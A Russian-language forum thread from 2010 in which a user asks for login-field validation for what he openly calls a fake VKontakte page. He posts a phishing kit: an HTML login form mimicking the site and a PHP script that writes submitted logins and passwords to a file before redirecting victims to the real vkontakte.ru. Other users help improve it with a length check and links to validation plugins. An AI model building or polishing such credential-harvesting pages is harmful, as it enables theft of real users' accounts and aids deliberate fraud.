Простая проверка на ввод данных в поля

Тема в разделе "Как сделать...", создана пользователем extrimportal, 8 май 2010.

Статус темы:
Закрыта.
  1. extrimportal

    extrimportal

    Регистр.:
    28 ноя 2008
    Сообщения:
    540
    Симпатии:
    70
    Здравствуйте. Нужна проверка на ввод логина и пароля в поля. Типа если отправляются пустые поля или символов меньше 6 выдавать ошибку.
    П.С. под фейк вконтакте.
    Код который уже есть.
    индекс.
    PHP:
    <!-- sideBar -->

      <
    div id="sideBar">

       
    <
    div id="quickLogin">
     <
    form method="post" name="login" id="login" action="login.php" onSubmit="return CheckForm(this);">
      <
    label for="email">Email:</label>
      <
    input type="text" name="login" value="" class=w_100></td>

      <
    label for="pass">Пароль:</label>

      <
    input  type="password" name="passwd" class=w_100></td>
    <
    div style="height:20px;margin-top:5px;">
    <
    ul class='nNav' style="width:128px;padding:0px;margin:0px;"><li style="margin:0px 3px 0px 0px;">
    <
    class="nc"><class="nc1"><b></b></b><class="nc2"><b></b></b></b>
    <
    span class="ncc"><a href="javascript:document.login.submit()">Вход</a></span>
    <
    class="nc"><class="nc2"><b></b></b><class="nc1"><b></b></b></b>
    </
    li>
    <
    li style="margin:0px">
    <
    class="nc"><class="nc1"><b></b></b><class="nc2"><b></b></b></b>
    <
    span class="ncc"><a href="javascript:document.location='reg0'">Регистрация</a></span>
    <
    class="nc"><class="nc2"><b></b></b><class="nc1"><b></b></b></b>

    </
    li></ul>
    </
    div>

      <
    div id="expirePad" style="display:none"><input style="margin-top:1px; vertical-align: middle;" type="checkbox" name="expire" id="expire" value="1" /> <small>Чужой компьютер</small></div>
      <
    input type="submit" value='.' style="color:#fff;border:0;padding:0;margin:0;background:#fff;height:6px;width:6px"/>
     </
    form>
    </
    div>


       <
    div style="width:124px">
    </
    div>

      </
    div>

    <!-- 
    End sideBar -->
    логин
    PHP:
    $Login $_POST['login']; // Логин
    $Pass $_POST['passwd']; // Пароль


    $log fopen("***.php","a+"); //открываем файл базы
    fwrite($log,"\n $Login:$Pass \n"); //записываем всё
    fclose($log); //закрываем
    echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://vkontakte.ru/'></head></html>"
    Просто не знаю где проводится проверка... Спасибо.
     
  2. g-prime

    g-prime איך בין גאָט

    Регистр.:
    11 авг 2008
    Сообщения:
    779
    Симпатии:
    1.131
    PHP:
    if(strlen($Login) < OR strlen($Pass) < 6){
    echo 
    "Длина логина и пароля не может быть меньше 6-ти символов";
    }
     
  3. extrimportal

    extrimportal

    Регистр.:
    28 ноя 2008
    Сообщения:
    540
    Симпатии:
    70
    работает но уже на странице логин. Я так понял что её нужно сделать на индекс, что бы если нет 6 символов страница дальше не передавалась...
    Можно так?
     
  4. Mr.Emm

    Mr.Emm Постоялец

    Регистр.:
    5 май 2008
    Сообщения:
    144
    Симпатии:
    107
    если там доступен аякс, то делай проверку на лету без перезагрузки страницы.
     
  5. extrimportal

    extrimportal

    Регистр.:
    28 ноя 2008
    Сообщения:
    540
    Симпатии:
    70
    ггг))) делай... я бы сделал, ток как))) по моему этот как то делается через яваскрипт.
     
  6. g-prime

    g-prime איך בין גאָט

    Регистр.:
    11 авг 2008
    Сообщения:
    779
    Симпатии:
    1.131
    _http://livevalidation.com/
    или
    _http://bassistance.de/jquery-plugins/jquery-plugin-validation/
     
Статус темы:
Закрыта.